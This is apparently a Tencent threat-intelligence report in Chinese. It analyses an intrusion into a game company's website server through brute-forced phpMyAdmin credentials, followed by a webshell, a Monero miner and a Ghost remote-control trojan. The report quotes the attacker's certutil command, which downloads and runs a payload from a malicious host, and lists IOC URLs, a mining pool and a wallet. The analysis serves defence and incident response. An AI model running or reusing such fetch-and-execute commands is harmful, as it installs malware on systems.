• 产品中心

    产品中心

    • 基础安全

      T-Sec 主机安全

      容器安全服务 TCSS

      T-Sec Web应用防火墙

      T-Sec 云防火墙

      T-Sec 安全运营中心

      T-Sec iOA零信任安全管理系统

    • 业务安全

      T-Sec 天御 验证码

      T-Sec 天御 文本内容安全

      T-Sec 天御 视频内容安全

      T-Sec 全栈式风控引擎

      T-Sec 手游安全

      T-Sec 小程序安全

      T-Sec 应用合规平台

    • 数据安全

      T-Sec 堡垒机

      T-Sec 数据安全审计

      T-Sec 云访问安全代理

      T-Sec 凭据管理系统

      T-Sec 密钥管理系统

      T-Sec 云加密机

      T-Sec 数据安全治理中心

    • 安全服务

      T-Sec 安全专家服务

      一站式等保服务

      T-Sec 安全托管服务

      渗透测试服务

      应急响应服务

      重要时期安全保障服务

      安全攻防对抗服务

    了解全部安全产品

  • 解决方案

    解决方案

    • 通用解决方案

      等保合规安全解决方案

      直播安全解决方案

      数据安全解决方案

      品牌保护解决方案

      高防云主机安全解决方案

      腾讯安心平台解决方案

    • 行业场景方案

      游戏安全场景方案

      电商安全场景方案

      智慧零售场景方案

      智慧出行场景方案

    • 安全专项解决方案

      勒索病毒专项解决方案

      重大保障安全解决方案

  • 更多

    更多

    • 关于我们

      腾讯安全介绍

      荣誉认证

    • 帮助中心

      帮助文档

    • 考试认证

      在线课堂

      证书查询

    • 联系我们

      产品方案咨询

      寻求市场合作

    • 友情链接

      腾讯云

威胁研究正文

北京某手游公司官网配置不当被黑,官服惨变矿机,玩家信息或泄露

2018-07-25 06:48:40

近日,腾讯御见威胁情报中心感知到北京某互娱公司所属手游官网服务器被黑,并且被植入了挖矿木马。攻击者在该服务器挖矿之后,还使用Ghost远程控制木马的变种完全控制了该服务器,致使该服务器的所有信息都可被攻击者掌握,该游戏官网的不当配置可能导致玩家个人信息泄露。

一、概述

近日,腾讯御见威胁情报中心感知到北京某互娱公司所属手游官网服务器被黑,并且被植入了挖矿木马。



技术分析发现,入侵者通过官网phpMyadmin后台管理登录页面爆破登录,再下载挖矿木马挖门罗币,管理员对服务器的不正确配置成为黑客入侵的最佳通道。

攻击者在该服务器挖矿之后,还使用Ghost远程控制木马的变种完全控制了该服务器,致使该服务器的所有信息都可被攻击者掌握,该游戏官网的不当配置可能导致玩家个人信息泄露。

腾讯安全专家提醒phpStudy搭建网站的用户加固服务器,移除不正确的配置,避免服务器成为黑客控制的肉鸡。

二、入侵分析

对入侵的机器进行分析,发现黑客通过工具对其官网服务器phpMyadmin后台管理登录页面进行弱口令猜解,猜解成功后,并写入webshell,通过getshell执行下载挖矿木马进行挖矿。

通过受害者服务器暴露在外的信息发现,受害者服务器使用phpStudy搭建。

phpStudy探针)

phpStudy是一个PHP调试环境的程序集成包。该程序包集成最新的Apache+PHP+MySQL+phpMyAdmin+ZendOptimizer,一次性安装,无须配置即可使用,是非常方便、好用的PHP调试环境。该程序不仅包括PHP调试环境,还包括了开发工具、开发手册等,总之学习PHP只需一个包。

通过访问phpStudy探针可以看到服务器详细信息。并且该页面可尝试进行mysql登录。

Mysql登录)

黑客入侵后写入webshell,通过getshell执行以下命令:

cmd.exe /c "certutil.exe -urlcache -split -f http://down.ctosus.ru/wkinstall.exe &wkinstall.exe &del wkinstall.exe"

三、样本分析

1. 母体Wkinstall.exe分析

Wkinstall.exe是一个自解压文件:


首先会运行start.bat,然后start.bat会创建任务并执行down.batopen.bat


down.bat负责下载远程控制木马hh.exe和挖矿组件wrsngm.zip,并运行qc.bat

qc.bat负责清除上传的cmd.phpWkinstall.exe


open.bat负责运行矿机:


2. 远控hh.exe分析

hh.exe首先会解密内置字符串,解密出来的为图片,下载地址为:

http://down.ctosus.ru/ctos002.jpg

下载下来的图片是一个加密的文件,hh.exe会解密图片。

解密后发现为经过UPX加壳的dll,随后会进行UPX的解压缩,解压缩后去除PE头部信息并写入到未解压缩之前DLL的内存中,定位执行点传入参数执行。


分析发现该DLLGhost变种远程控制木马。


3. wrsngm.zip矿机分析

wrsngm.zip为一个压缩包,里面包含了门罗币的挖矿程序和相关的配置文件:




矿池:wk.ctosus.ru:9999

钱包:

4Ak2AQiC1R4hFmvfSYRXfX6JSjR6YN9E81SRvLXRzeCefRWhSXq3SKDf8ZEFmpobNkXmgXnqA3CGKgaiAEJ2pjYi8BeQcn7

四、攻击者分析

根据作者在配置文件中留下的一些线索,我们进行分析:


在该服务器进行分析,发现服务器上存放着大量的黑客工具。


并且发现了此次使用的phpMyadmin爆破工具和webshell


(黑客工具包)

同时在其服务器主页上发现其个人社交信息,与挖矿配置文件中的社交信息吻合,确定下载服务器为其个人所有。



对此人社交帐号继续进行分析,发现其云盘中也存放着多个黑客利用工具,还有16年在渗透吧就交流过phpMyadmin入侵提权方法。



五、解决方案

1. 加固服务器,修补服务器安全漏洞。及时修改mysql密码,移除探针,移除phpmyadmin

2. 使用腾讯御知网络空间风险雷达(网址:https://s.tencent.com/product/yuzhi/index.html)进行风险扫描和站点监控。

3. 网站管理员可使用腾讯云网站管家智能防护平台(网址:https://s.tencent.com/product/wzgj/index.html),该系统具备Web入侵防护,0Day漏洞补丁修复等多纬度防御策略,可全面保护网站系统安全。

六、附录:IOCs

URL:

http://down.ctosus.ru/hh.exe

http://down.ctosus.ru/wrsngm.zip

http://down.ctosus.ru

https://blog.ctoscn.ru

http://down.ctosus.ru/wkinstall.exe

http://down.ctosus.ru/ctos002.jpg

MD5

1415809a5ada011987abe56914dcfb9e

226c5e3a2b22297668fd35882b378fcd

d27202ad0a80edefc2067a7d905f2044

  • 产品方案

    • 产品中心

  • 威胁研究

    • 威胁通告
    • 研究报告

  • 合作伙伴

    • 合作伙伴详情

  • 其他

    • 腾讯安全介绍
    • 新闻活动
    • 在线课堂

  • 友情链接

    • 腾讯云

腾讯安全公众号

腾讯安全视频中心

Copyright©1998-2024 Tencent. All Rights Reserved.

在线咨询

方案定制